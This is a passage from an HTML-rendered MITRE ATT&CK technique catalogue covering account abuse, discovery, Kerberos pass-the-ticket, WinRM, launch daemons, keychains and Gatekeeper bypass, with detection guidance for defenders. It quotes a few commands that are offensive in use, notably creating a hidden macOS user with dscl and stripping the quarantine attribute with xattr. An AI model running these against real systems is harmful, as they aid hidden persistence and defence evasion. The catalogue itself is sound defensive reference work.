<p>Detection: Configure robust, consistent account activity audit policies across the enterprise. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</p>
</div>
<div class="paragraph">
<p>Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Firewall, Host intrusion prevention systems, Network intrusion detection system, Process whitelisting, System access controls</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 829. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1078">https://attack.mitre.org/wiki/Technique/T1078</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn535501.aspx">https://technet.microsoft.com/en-us/library/dn535501.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn487457.aspx">https://technet.microsoft.com/en-us/library/dn487457.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_service_discovery_t1007"><a class="anchor" href="#_system_service_discovery_t1007"></a><a class="link" href="#_system_service_discovery_t1007">System Service Discovery - T1007</a></h3>
<div class="paragraph">
<p>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 830. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1007">https://attack.mitre.org/wiki/Technique/T1007</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_users_t1147"><a class="anchor" href="#_hidden_users_t1147"></a><a class="link" href="#_hidden_users_t1147">Hidden Users - T1147</a></h3>
<div class="paragraph">
<p>Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; called &lt;code&gt;Hide500Users&lt;/code&gt; that prevents users with userIDs 500 and lower from appearing at the login screen. By using the Create Account technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt; (Citation: Cybereason OSX Pirrit).</p>
</div>
<div class="paragraph">
<p>Detection: This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 831. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1147">https://attack.mitre.org/wiki/Technique/T1147</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty">https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_owner_user_discovery_t1033"><a class="anchor" href="#_system_owner_user_discovery_t1033"></a><a class="link" href="#_system_owner_user_discovery_t1033">System Owner/User Discovery - T1033</a></h3>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>===Linux===</p>
</div>
<div class="paragraph">
<p>On Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 832. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1033">https://attack.mitre.org/wiki/Technique/T1033</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multiband_communication_t1026"><a class="anchor" href="#_multiband_communication_t1026"></a><a class="link" href="#_multiband_communication_t1026">Multiband Communication - T1026</a></h3>
<div class="paragraph">
<p>Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 833. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1026">https://attack.mitre.org/wiki/Technique/T1026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pass_the_ticket_t1097"><a class="anchor" href="#_pass_the_ticket_t1097"></a><a class="link" href="#_pass_the_ticket_t1097">Pass the Ticket - T1097</a></h3>
<div class="paragraph">
<p>Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account&#8217;s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.</p>
</div>
<div class="paragraph">
<p>In this technique, valid Kerberos tickets for Valid Accounts are captured by Credential Dumping. A user&#8217;s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)</p>
</div>
<div class="paragraph">
<p>Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)</p>
</div>
<div class="paragraph">
<p>Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)</p>
</div>
<div class="paragraph">
<p>Detection: Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.</p>
</div>
<div class="paragraph">
<p>Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket. (Citation: CERT-EU Golden Ticket Protection)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>System Requirements: Requires Microsoft Windows as a target system and Kerberos authentication enabled.</p>
</div>
<div class="paragraph">
<p>Contributors: Ryan Becwar, Vincent Le Toux</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 834. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1097">https://attack.mitre.org/wiki/Technique/T1097</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://adsecurity.org/?p=556">https://adsecurity.org/?p=556</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf">http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos">http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_remote_management_t1028"><a class="anchor" href="#_windows_remote_management_t1028"></a><a class="link" href="#_windows_remote_management_t1028">Windows Remote Management - T1028</a></h3>
<div class="paragraph">
<p>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: WinRM listener turned on and configured on remote system</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 835. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1028">https://attack.mitre.org/wiki/Technique/T1028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa384426">http://msdn.microsoft.com/en-us/library/aa384426</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2">https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_launch_daemon_t1160"><a class="anchor" href="#_launch_daemon_t1160"></a><a class="link" href="#_launch_daemon_t1160">Launch Daemon - T1160</a></h3>
<div class="paragraph">
<p>Per Apples developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in &lt;code&gt;/System/Library/LaunchDaemons&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).</p>
</div>
<div class="paragraph">
<p>Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.</p>
</div>
<div class="paragraph">
<p>The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemons executable and gain persistence or Privilege Escalation.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See&#8217;s Knock Knock application.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: root</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 836. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1160">https://attack.mitre.org/wiki/Technique/T1160</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf">https://www.synack.com/wp-content/uploads/2016/03/RSA%20OSX%20Malware.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf">https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_keychain_t1142"><a class="anchor" href="#_keychain_t1142"></a><a class="link" href="#_keychain_t1142">Keychain - T1142</a></h3>
<div class="paragraph">
<p>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in &lt;code&gt;~/Library/Keychains/&lt;/code&gt;,&lt;code&gt;/Library/Keychains/&lt;/code&gt;, and &lt;code&gt;/Network/Library/Keychains/&lt;/code&gt;. (Citation: Wikipedia keychain) The &lt;code&gt;security&lt;/code&gt; command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.</p>
</div>
<div class="paragraph">
<p>To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the users logon credentials.</p>
</div>
<div class="paragraph">
<p>Detection: Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: System calls, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 837. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1142">https://attack.mitre.org/wiki/Technique/T1142</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Keychain%20(software)">https://en.wikipedia.org/wiki/Keychain%20(software)</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_audio_capture_t1123"><a class="anchor" href="#_audio_capture_t1123"></a><a class="link" href="#_audio_capture_t1123">Audio Capture - T1123</a></h3>
<div class="paragraph">
<p>An adversary can leverage a computer&#8217;s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.</p>
</div>
<div class="paragraph">
<p>Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.</p>
</div>
<div class="paragraph">
<p>Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process monitoring, File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 838. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1123">https://attack.mitre.org/wiki/Technique/T1123</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_custom_cryptographic_protocol_t1024"><a class="anchor" href="#_custom_cryptographic_protocol_t1024"></a><a class="link" href="#_custom_cryptographic_protocol_t1024">Custom Cryptographic Protocol - T1024</a></h3>
<div class="paragraph">
<p>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.</p>
</div>
<div class="paragraph">
<p>Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.</p>
</div>
<div class="paragraph">
<p>Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)</p>
</div>
<div class="paragraph">
<p>Detection: If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect when communications do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Malware reverse engineering, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 839. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1024">https://attack.mitre.org/wiki/Technique/T1024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/cosmicduke%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/cosmicduke%20whitepaper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf">https://www.fidelissecurity.com/sites/default/files/FTA%201018%20looking%20at%20the%20sky%20for%20a%20dark%20comet.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_graphical_user_interface_t1061"><a class="anchor" href="#_graphical_user_interface_t1061"></a><a class="link" href="#_graphical_user_interface_t1061">Graphical User Interface - T1061</a></h3>
<div class="paragraph">
<p>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</p>
</div>
<div class="paragraph">
<p>Detection: Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions.</p>
</div>
<div class="paragraph">
<p>Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of Legitimate Credentials to access remote systems within the network.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>Remote Support: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 840. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1061">https://attack.mitre.org/wiki/Technique/T1061</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gatekeeper_bypass_t1144"><a class="anchor" href="#_gatekeeper_bypass_t1144"></a><a class="link" href="#_gatekeeper_bypass_t1144">Gatekeeper Bypass - T1144</a></h3>
<div class="paragraph">
<p>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple&#8217;s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.</p>
</div>
<div class="paragraph">
<p>Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network wont set this flag. Additionally, other utilities or events like drive-by downloads dont necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)</p>
</div>
<div class="paragraph">
<p>In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOSs gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting, Anti-virus</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 841. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1144">https://attack.mitre.org/wiki/Technique/T1144</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/">https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update">https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/">https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fallback_channels_t1008"><a class="anchor" href="#_fallback_channels_t1008"></a><a class="link" href="#_fallback_channels_t1008">Fallback Channels - T1008</a></h3>
<div class="paragraph">
<p>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Malware reverse engineering, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 842. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
